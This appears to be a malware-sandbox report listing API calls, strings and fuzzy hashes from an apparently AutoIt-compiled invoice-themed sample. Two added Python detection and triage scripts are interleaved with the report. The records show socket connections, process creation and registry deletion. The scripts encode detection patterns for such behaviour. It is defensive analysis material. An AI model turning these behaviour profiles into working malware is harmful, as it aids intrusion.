                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                          • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                                          • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                          • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                                          APIs
                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: ,,I$DllGetClassObject
                                          • API String ID: 753597075-1683996018
                                          • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                          • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                          • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                          • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                          APIs
                                            • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                            • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                          • lstrcmpiW.KERNEL32(?,?), ref: 004636B7
                                          • _wcscmp.LIBCMT ref: 004636D3
                                          • MoveFileW.KERNEL32(?,?), ref: 004636EB
                                          • _wcscat.LIBCMT ref: 00463733
                                          • SHFileOperationW.SHELL32(?), ref: 0046379F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1377345388-1173974218
                                          • Opcode ID: 0993e5ca929c2efa997c1b424dbcfd90290d04f9ce8d0f9705211f6a3ce64837
                                          • Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
                                          • Opcode Fuzzy Hash: 0993e5ca929c2efa997c1b424dbcfd90290d04f9ce8d0f9705211f6a3ce64837
                                          • Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B
                                          APIs
                                          • _memset.LIBCMT ref: 004872AA
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                          • IsMenu.USER32(?), ref: 00487369
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                          • DrawMenuBar.USER32 ref: 004873C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0
                                          • API String ID: 3866635326-4108050209
                                          • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                          • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                          • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                          • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                          • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                            • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                            • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                            • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                          • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                          • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                          • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                          • GetWindowLongW.USER32(00C711A8,000000F0), ref: 0048631F
                                          • GetWindowLongW.USER32(00C711A8,000000F0), ref: 00486354
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                          • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                          • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                          • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                          APIs
                                            • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                          • WSAGetLastError.WSOCK32 ref: 00476221
                                          • closesocket.WSOCK32(00000000), ref: 0047624A
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 910771015-0
                                          • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                          • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                          • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                          • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                          • API String ID: 1038674560-2734436370
                                          • Opcode ID: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                          • Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
                                          • Opcode Fuzzy Hash: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                          • Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F
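The three strings in this record (#OnAutoItStartRegister, #notrayicon, #requireadmin) are AutoIt3 script directives, and the function around them compares candidates with __wcsnicmp, that is, as case-insensitive wide strings. A compiled AutoIt binary carries the interpreter, so its directive table is a cheap fingerprint for triage of files or memory dumps. The following scanner is an added example, not part of the Joe Sandbox report or of any AutoIt tooling; it searches for the directives in both ASCII and UTF-16LE, mirrors the case-insensitive comparison, and uses a two-directive threshold that is an assumption of this example, not a published rule. The sample blobs are constructed here and are not real binaries.

```python
# AutoIt3 preprocessor directives that the embedded interpreter recognises.
# The report's __wcsnicmp record compares them as wide strings, so the
# interpreter stores them as UTF-16LE; an ASCII-only grep misses them.
AUTOIT_DIRECTIVES = ("#OnAutoItStartRegister", "#notrayicon", "#requireadmin")


def find_all(haystack: bytes, needle: bytes):
    """Yield every offset of needle in haystack, ASCII case-insensitive (mirrors __wcsnicmp)."""
    h, n = haystack.lower(), needle.lower()
    start = 0
    while (i := h.find(n, start)) != -1:
        yield i
        start = i + 1


def autoit_directive_hits(data: bytes) -> dict:
    """Map each directive found to a list of (encoding, offset) pairs."""
    hits = {}
    for directive in AUTOIT_DIRECTIVES:
        for enc in ("ascii", "utf-16-le"):
            for off in find_all(data, directive.encode(enc)):
                hits.setdefault(directive, []).append((enc, off))
    return hits


def looks_like_autoit_runtime(data: bytes, min_directives: int = 2) -> bool:
    """Heuristic; the threshold is an assumption of this example, not a published rule."""
    return len(autoit_directive_hits(data)) >= min_directives


# Constructed inputs, not real binaries: a fake image with the directives stored
# as NUL-terminated UTF-16LE strings, and one without them.
SAMPLE_AUTOIT_BLOB = (
    b"MZ" + b"\x00" * 62
    + b"".join(d.encode("utf-16-le") + b"\x00\x00" for d in AUTOIT_DIRECTIVES)
    + b"\x90" * 32
)
SAMPLE_CLEAN_BLOB = b"MZ" + b"\x00" * 62 + b"#include <stdio.h>\x00" + b"\x90" * 32

if __name__ == "__main__":
    for name, blob in (("autoit", SAMPLE_AUTOIT_BLOB), ("clean", SAMPLE_CLEAN_BLOB)):
        print(name, looks_like_autoit_runtime(blob), autoit_directive_hits(blob))
```

Point the same functions at a dumped .sdmp region or the file on disk (`open(path, "rb").read()`); a hit only says the AutoIt3 interpreter is present, so confirm a compiled script by extracting the embedded script resource before attributing behaviour to it.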
                                          APIs
                                            • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                            • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                            • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                          • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                                          • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                          • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                                          APIs
                                          • _memset.LIBCMT ref: 0048B644
                                          • _memset.LIBCMT ref: 0048B653
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
                                          • CloseHandle.KERNEL32 ref: 0048B694
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID: oL$doL
                                          • API String ID: 3277943733-3421622115
                                          • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                          • Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
                                          • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                          • Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                          • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                          • EncodePointer.KERNEL32(00000000), ref: 00424097
                                          • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 3489934621-2819208100
                                          • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                          • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                          • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                          • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
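Every function record in this report has the same layout: an APIs list (api.module(args), ref: address, with lines reached through a callee marked "Part of subcall function"), a Similarity block carrying API, opcode and instruction fuzzy hashes, and a memory-dump source. When a report runs to thousands of such records, it pays to parse them and tag the handful worth reading first. The script below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses a few lines copied from the socket, CreateProcessW and LoadLibraryExW records above and applies rules whose names and thresholds are my own. The rules encode facts a practitioner would check by hand: the ioctlsocket command 8004667E is FIONBIO, so the socket is switched to non-blocking mode before connect, which is why WSAGetLastError follows connect immediately (a non-blocking connect returns WSAEWOULDBLOCK); CreateProcessW's creation flags 00000020 are NORMAL_PRIORITY_CLASS; and LoadLibraryExW(combase.dll, 0, 00000800) uses LOAD_LIBRARY_SEARCH_SYSTEM32 and, together with GetProcAddress(RoUninitialize) and EncodePointer/DecodePointer, is typical of Visual C++ runtime start-up code rather than of the payload, so the "runtime API resolution" tag is a prioritisation hint and not an indicator on its own.

```python
import re
from collections import Counter

BULLET = "\u2022"  # the report renders list items with U+2022

# One API call line: "• [Part of subcall function X: ]api.module(args), ref: addr"
API_LINE = re.compile(
    rf"^[{BULLET}*]\s+(?P<sub>Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s+)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)
HASH_LINE = re.compile(rf"^[{BULLET}*]\s+Instruction Fuzzy Hash:\s+(?P<hash>[0-9A-Fa-f]+)$")

# Constructed input: lines copied from the socket, CreateProcessW and
# LoadLibraryExW records of this report, trimmed to what the parser reads.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
• WSAGetLastError.WSOCK32(00000000), ref: 004761D5
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
• connect.WSOCK32(00000000,?,00000010), ref: 00476217
• WSAGetLastError.WSOCK32 ref: 00476221
• closesocket.WSOCK32(00000000), ref: 0047624A
Similarity
• Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
APIs
• _memset.LIBCMT ref: 0048B644
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
• CloseHandle.KERNEL32 ref: 0048B694
Similarity
• Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
• GetProcAddress.KERNEL32(00000000), ref: 0042408C
Similarity
• Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
"""


def parse_records(text: str) -> list:
    """Split report text into function records, each with its API calls and fuzzy hash."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"calls": [], "fuzzy_hash": None}
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            current["calls"].append({
                "api": m["api"], "module": m["module"],
                "args": [a for a in (m["args"] or "").split(",") if a],
                "ref": int(m["ref"], 16),
                "subcall": m["sub"] is not None,  # made by a callee, not by this function itself
            })
            continue
        m = HASH_LINE.match(line)
        if m:
            current["fuzzy_hash"] = m["hash"]
    return records


FIONBIO = 0x8004667E  # ioctlsocket command that switches a socket to non-blocking mode
LOADLIB = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
REG_DELETE = {"RegDeleteKeyA", "RegDeleteKeyW", "RegDeleteValueA", "RegDeleteValueW"}


def triage(record: dict) -> list:
    """Tag one record. Tags are prioritisation hints, not verdicts; rule names are this example's own."""
    own = [c for c in record["calls"] if not c["subcall"]]
    apis = {c["api"] for c in own}
    tags = []
    if {"socket", "connect"} <= apis:
        tags.append("outbound TCP connect")
    if any(c["api"] == "ioctlsocket" and len(c["args"]) > 1
           and c["args"][1].upper() == f"{FIONBIO:08X}" for c in own):
        tags.append("non-blocking socket (FIONBIO)")
    if apis & {"CreateProcessA", "CreateProcessW"}:
        tags.append("process creation")
    if apis & LOADLIB and "GetProcAddress" in apis:
        tags.append("runtime API resolution")  # also hit by ordinary CRT start-up code
    if apis & REG_DELETE:
        tags.append("registry deletion")
    return tags


def api_histogram(records: list) -> Counter:
    """Count how often each API name appears across all records (subcalls excluded)."""
    return Counter(c["api"] for r in records for c in r["calls"] if not c["subcall"])


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE_REPORT)):
        print(i, rec["fuzzy_hash"][:16], [c["api"] for c in rec["calls"]], triage(rec))
```

Feed the whole report text to parse_records and sort records by the number of tags; the instruction fuzzy hash of each tagged record can then be compared against other reports to see whether the same function recurs across samples.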
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
